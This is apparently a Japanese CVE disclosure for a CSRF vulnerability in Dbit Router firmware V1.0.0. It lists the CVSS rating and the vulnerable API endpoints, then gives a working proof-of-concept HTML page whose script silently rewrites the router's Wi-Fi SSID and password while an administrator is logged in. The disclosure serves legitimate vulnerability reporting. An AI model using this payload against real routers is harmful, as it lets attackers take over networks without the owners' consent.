
CVE-2026-36956の概念実証。DbitルーターのファームウェアにおけるCSRF脆弱性で、偽造リクエストを介して不正な設定変更を可能にします。
CVE ID: CVE-2026-36956 日付: 2026-04-29 発見者: Kirubel Solomne ベンダー: Shenzhen Dibit Network Equipment Co., Ltd. 製品: Dbit Router ファームウェアバージョン: V1.0.0 CWE: CWE-352 - クロスサイトリクエストフォージェリ (CSRF)
Dbit Router ファームウェア V1.0.0 は、管理APIエンドポイントにおいて、CSRFトークンや厳格なOrigin/Referer検証などのCSRF対策メカニズムを実装していません。攻撃者は、設定エンドポイントに対して偽造されたHTTPリクエストを送信する悪意のあるWebページを作成できます。認証済みの管理者がその悪意のあるページを訪問すると、ルーターは偽造されたリクエストを正当な管理操作として処理します。
CVSS v3.1 スコア: 8.8 (高)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| メトリック | 値 |
|---|---|
| 攻撃元ベクトル | ネットワーク |
| 攻撃の複雑さ | 低 |
| 必要な特権 | なし |
| ユーザー操作 | 必要 |
| 機密性への影響 | 高 |
| 完全性への影響 | 高 |
| 可用性への影響 | 高 |
| エンドポイント | 機能 |
|---|---|
/api/setWlan | ワイヤレスネットワーク設定 (SSID、パスワード) |
/api/setWan | WAN設定 |
/api/setSystem | システム設定 |
以下を poc.html として保存し、管理者がルーターにログインしている状態で開いてください:
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
期待される動作: CSRFトークンの不一致によりリクエストは拒否されるべきです。 実際の動作: ルーターは偽造されたリクエストを受け入れ、処理します。
| 日付 | イベント |
|---|---|
| 2026-04-29 | 脆弱性を発見 |
| 2026-04-29 | MITREに報告 |
| 2026-04-29 | CVE-2026-36956 が割り当てられる |
| 2026-04-29 | 公開開示 |